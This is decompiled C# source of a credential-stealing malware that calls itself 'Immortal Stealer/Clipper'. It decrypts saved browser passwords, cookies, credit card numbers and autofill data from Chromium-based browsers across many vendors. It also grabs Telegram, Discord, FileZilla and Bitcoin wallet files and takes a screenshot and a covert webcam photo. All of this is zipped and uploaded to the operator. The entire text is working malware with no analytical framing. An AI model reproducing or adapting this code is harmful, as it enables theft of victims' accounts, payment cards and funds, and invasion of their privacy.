// Token: 0x06000005 RID: 5
private static List <Cookie> fetch_cookies(string string_0)
{
List <Cookie> result;
if (!File.Exists(string_0))
{
result = null;
}
else
{
try
{
string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_0, text, true);
SqlHandler sqlHandler = new SqlHandler(text);
sqlHandler.ReadTable("cookies");
List <Cookie> list = new List <Cookie>();
for (int i = 0; i < sqlHandler.GetRowCount(); i++)
{
try
{
string value = string.Empty;
try
{
value = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null));
}
catch (Exception)
{
}
bool flag;
bool.TryParse(sqlHandler.GetValue(i, 6), out flag);
list.Add(new Cookie
{
domain = sqlHandler.GetValue(i, 1),
name = sqlHandler.GetValue(i, 2),
path = sqlHandler.GetValue(i, 4),
expirationDate = sqlHandler.GetValue(i, 5),
secure = flag.ToString().ToUpper(),
value = value,
hostOnly = "TRUE"
});
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
result = list;
}
catch
{
result = new List <Cookie>();
}
}
return(result);
}
// Token: 0x06000058 RID: 88
private static List <CardData> fetch_cookies(string string_0)
{
List <CardData> result;
if (!File.Exists(string_0))
{
result = null;
}
else
{
try
{
string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_0, text, true);
SqlHandler sqlHandler = new SqlHandler(text);
sqlHandler.ReadTable("CC");
List <CardData> list = new List <CardData>();
for (int i = 0; i < sqlHandler.GetRowCount(); i++)
{
try
{
string number = string.Empty;
try
{
number = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null));
}
catch (Exception)
{
}
bool flag;
bool.TryParse(sqlHandler.GetValue(i, 6), out flag);
list.Add(new CardData
{
Name = sqlHandler.GetValue(i, 1),
Exp_m = sqlHandler.GetValue(i, 2),
Exp_y = sqlHandler.GetValue(i, 3),
Number = number,
Billing = sqlHandler.GetValue(i, 9)
});
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
result = list;
}
catch
{
result = new List <CardData>();
}
}
return(result);
}
// Token: 0x06000044 RID: 68 RVA: 0x0000559C File Offset: 0x0000379C
private static List <FormData> smethod_1(string string_0)
{
List <FormData> result;
if (!File.Exists(string_0))
{
result = null;
}
else
{
try
{
string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_0, text, true);
SqlHandler sqlHandler = new SqlHandler(text);
sqlHandler.ReadTable("Autofill");
List <FormData> list = new List <FormData>();
for (int i = 0; i < sqlHandler.GetRowCount(); i++)
{
try
{
try
{
Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null));
}
catch (Exception)
{
}
bool flag;
bool.TryParse(sqlHandler.GetValue(i, 6), out flag);
list.Add(new FormData
{
Name = sqlHandler.GetValue(i, 0),
Value = sqlHandler.GetValue(i, 1)
});
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
result = list;
}
catch
{
result = new List <FormData>();
}
}
return(result);
}
// Token: 0x06000029 RID: 41
public static void stealer_main_routine()
{
string text = Class8.Random_string();
string text2 = Path.GetTempPath() + text;
Directory.CreateDirectory(text2);
using (StreamWriter streamWriter = new StreamWriter(text2 + "\\passwords.log"))
{
streamWriter.WriteLine(string.Concat(new string[]
{
"[==================== Immortal Stealer/Clipper ====================]\r\n[=================== Create By Zet5D ===================]\r\n[=================== Telegram: @Zet5D ===================]\r\n",
string.Format("Date: {0}\r\n", DateTime.Now),
string.Format("Windows Username: {0}\r\n", Environment.UserName),
string.Format("HWID: {0}\r\n", Class2.hwid),
string.Format("System: {0}\r\n", Class9.define_windows())
}));
try
{
foreach (PassData value in Chromium.Initialise())
{
streamWriter.WriteLine(value);
}
}
catch
{
}
}
try
{
Class9.grab_desktop(text2);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Class9.grab_minecraft(text2);
}
catch (Exception)
{
}
try
{
Class9.grab_telegram(text2);
}
catch (Exception)
{
}
try
{
Class9.grab_discord(text2);
}
catch (Exception)
{
}
try
{
Class9.get_screenshot(text2 + "\\desktop.jpg");
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
}
try
{
Class9.Class10.get_webcam(text2 + "\\CamPicture.png");
}
catch (Exception ex3)
{
Console.WriteLine(ex3.ToString());
}
try
{
Class4.grab_cookies(text2 + "\\");
}
catch (Exception ex4)
{
Console.WriteLine(ex4.ToString());
}
try
{
Class14.grab_cards(text2 + "\\");
}
catch (Exception ex5)
{
Console.WriteLine(ex5.ToString());
}
try
{
GrabForms.grab_forms(text2 + "\\");
}
catch (Exception ex6)
{
Console.WriteLine(ex6.ToString());
}
try
{
Class6.Class7.get_filezilla(text2 + "\\");
}
catch (Exception ex7)
{
Console.WriteLine(ex7.ToString());
}
try
{
string bitcoin = CryptoWallets.get_bitcoin();
if (bitcoin != "" && File.Exists(bitcoin))
{
File.Copy(bitcoin, text2 + "\\wallet.dat");
}
}
catch (Exception ex8)
{
Console.WriteLine(ex8.ToString());
}
try
{
Class9.zip_folder(text2, Path.GetTempPath() + "\\" + text + ".zip");
}
catch (Exception ex9)
{
Console.WriteLine(ex9.ToString());
}
try
{
Class9.delete_folder(text2);
}
catch (Exception ex10)
{
Console.WriteLine(ex10.ToString());
}
try
{
Internet.upload_file(Path.GetTempPath() + "\\" + text + ".zip");
}
catch (Exception ex11)
{
Console.WriteLine(ex11.ToString());
}
}
// Token: 0x06000019 RID: 25 RVA: 0x000030F8 File Offset: 0x000012F8
private static List <PassData> smethod_0(string string_0)
{
List <PassData> result;
if (!File.Exists(string_0))
{
result = null;
}
else
{
string program = "";
if (string_0.Contains("Chrome"))
{
program = "Google Chrome";
}
if (string_0.Contains("Yandex"))
{
program = "Yandex Browser";
}
if (string_0.Contains("Orbitum"))
{
program = "Orbitum Browser";
}
if (string_0.Contains("Opera"))
{
program = "Opera Browser";
}
if (string_0.Contains("Amigo"))
{
program = "Amigo Browser";
}
if (string_0.Contains("Torch"))
{
program = "Torch Browser";
}
if (string_0.Contains("Comodo"))
{
program = "Comodo Browser";
}
if (string_0.Contains("CentBrowser"))
{
program = "CentBrowser";
}
if (string_0.Contains("Go!"))
{
program = "Go!";
}
if (string_0.Contains("uCozMedia"))
{
program = "uCozMedia";
}
if (string_0.Contains("MapleStudio"))
{
program = "MapleStudio";
}
if (string_0.Contains("BlackHawk"))
{
program = "BlackHawk";
}
if (string_0.Contains("CoolNovo"))
{
program = "CoolNovo";
}
if (string_0.Contains("Vivaldi"))
{
program = "Vivaldi";
}
if (string_0.Contains("Sputnik"))
{
program = "Sputnik";
}
if (string_0.Contains("Maxthon"))
{
program = "Maxthon";
}
if (string_0.Contains("AcWebBrowser"))
{
program = "AcWebBrowser";
}
if (string_0.Contains("Epic Browser"))
{
program = "Epic Browser";
}
if (string_0.Contains("Baidu Spark"))
{
program = "Baidu Spark";
}
if (string_0.Contains("Rockmelt"))
{
program = "Rockmelt";
}
if (string_0.Contains("Sleipnir"))
{
program = "Sleipnir";
}
if (string_0.Contains("SRWare Iron"))
{
program = "SRWare Iron";
}
if (string_0.Contains("Titan Browser"))
{
program = "Titan Browser";
}
if (string_0.Contains("Flock"))
{
program = "Flock";
}
try
{
string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(string_0, text, true);
SqlHandler sqlHandler = new SqlHandler(text);
List <PassData> list = new List <PassData>();
sqlHandler.ReadTable("logins");
for (int i = 0; i < sqlHandler.GetRowCount(); i++)
{
try
{
string text2 = string.Empty;
try
{
text2 = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 5)), null));
}
catch (Exception)
{
}
if (text2 != "")
{
list.Add(new PassData
{
Url = sqlHandler.GetValue(i, 1).Replace("https://", "").Replace("http://", ""),
Login = sqlHandler.GetValue(i, 3),
Password = text2,
Program = program
});
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
File.Delete(text);
result = list;
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
result = null;
}
}
return(result);
}
